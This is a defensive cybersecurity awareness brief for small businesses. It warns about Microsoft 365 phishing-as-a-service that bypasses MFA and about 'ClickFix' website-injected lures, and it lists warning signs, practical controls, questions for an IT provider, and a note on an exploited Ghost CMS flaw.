Today’s SMB cyber lookout: Microsoft 365 phishing (MFA bypass) and “ClickFix” website traps

Today’s look-out: Account takeover phishing and website-injected “ClickFix” scams

What to look out for today

Two themes to brief staff and check controls against today:

Microsoft 365 account takeover phishing being sold as a service (PhaaS) — including techniques designed to bypass MFA by tricking users during sign-in flows.
“ClickFix” style attacks where compromised websites inject prompts that try to convince users to “fix” something by following steps that lead to malware or credential theft.

Why this matters to smaller businesses

Email compromise leads to invoice fraud. If attackers get into a mailbox, they can watch for invoices, change bank details, and reply in-thread convincingly.
Microsoft 365 is a single point of failure. A stolen M365 session can expose email, OneDrive/SharePoint documents, Teams chats, and customer data.
“ClickFix” targets non-technical staff. It relies on social engineering rather than hacking skills, so it can spread quickly through normal browsing.
Supply-chain ripple effects. Even if your organisation isn’t targeted directly, a compromised supplier website or a commonly used website platform can become the delivery mechanism.

Warning signs

Unexpected sign-in prompts that mention “device code”, “pairing”, “approve sign-in”, or instructions to enter a code on a Microsoft page when you weren’t trying to sign in.
MFA prompts that arrive out of the blue, or staff reporting “I had to do something different to log in today”.
Browser pop-ups or website banners claiming: “Security check failed”, “Update required”, “Verification needed”, “Click to fix” — especially if they instruct copying/pasting, running steps, or downloading something.
New email rules, auto-forwarding, or “deleted items” activity a user can’t explain.
Customers/suppliers receiving strange emails from your staff that they weren’t expecting.

How attackers may exploit the situation

Phishing-as-a-service (PhaaS) lowers the barrier: attackers can rapidly launch realistic M365 login pages and workflows at scale.
Some M365 phishing services abuse authentication flows to capture session tokens so attackers can access accounts even where MFA is enabled.
Compromised websites can inject scripts that push users into “ClickFix” actions — making the victim do the risky part themselves.
Once inside email, criminals often aim for payment diversion (changing bank details) and data theft (contracts, payroll, customer lists).

What to do today

Send a 2-minute staff message: “If a login asks for a device code/pairing you didn’t start, or a website asks you to ‘ClickFix’ something, stop and report it.”
Check for mailbox tampering on key accounts (finance, directors, shared inboxes): forwarding rules, inbox rules, new delegates, and suspicious sign-in patterns.
Tighten payment process: mandate call-back verification (using known numbers) for any change of bank details or urgent payment request — even if the email thread looks genuine.
Make reporting easy: ensure staff know exactly how to report suspicious emails/pop-ups (shared mailbox, IT ticket, or the “Report phishing” button).

Ask your IT provider

Do we have conditional access and sign-in risk alerts enabled for Microsoft 365, and who monitors them?
Can we block or reduce risky sign-in methods and enforce stronger MFA where possible for finance/admin accounts?
Do we alert on new mailbox forwarding rules, new inbox rules, and suspicious OAuth/app consent activity?
If a user reports a “ClickFix” pop-up, what is the immediate triage playbook (isolate device, check browser extensions, credential reset, token revocation, log review)?

Patch watch - only one short paragraph, and only if relevant

If your organisation (or your web agency) uses Ghost CMS, there are reports of a live campaign exploiting a SQL injection flaw (CVE-2026-26980) to compromise sites and push “ClickFix” lures. This is mainly a risk for businesses running their own websites: ask whoever manages your site to confirm whether Ghost is used anywhere, and whether mitigations/updates have been applied.

One action today

Send a short internal warning today: “Never enter device/pairing codes you didn’t request, and never follow ‘ClickFix’ instructions from a website pop-up—report it to IT immediately.”

Related Actions On Cyber resource

CTA: Actions On Cyber checklist — “Invoice fraud & bank detail change verification (call-back process)”

Sources

FBI warns of Kali365 phishing service targeting Microsoft 365 accounts (BleepingComputer)
Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign (BleepingComputer)
Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks (The Hacker News)
2 PhaaS 2 Furious: The Evolution of Chinese-language Phishing Services (Google Threat Intelligence)

This brief is for general awareness and does not replace advice from your IT provider, legal adviser, insurer or incident response specialist.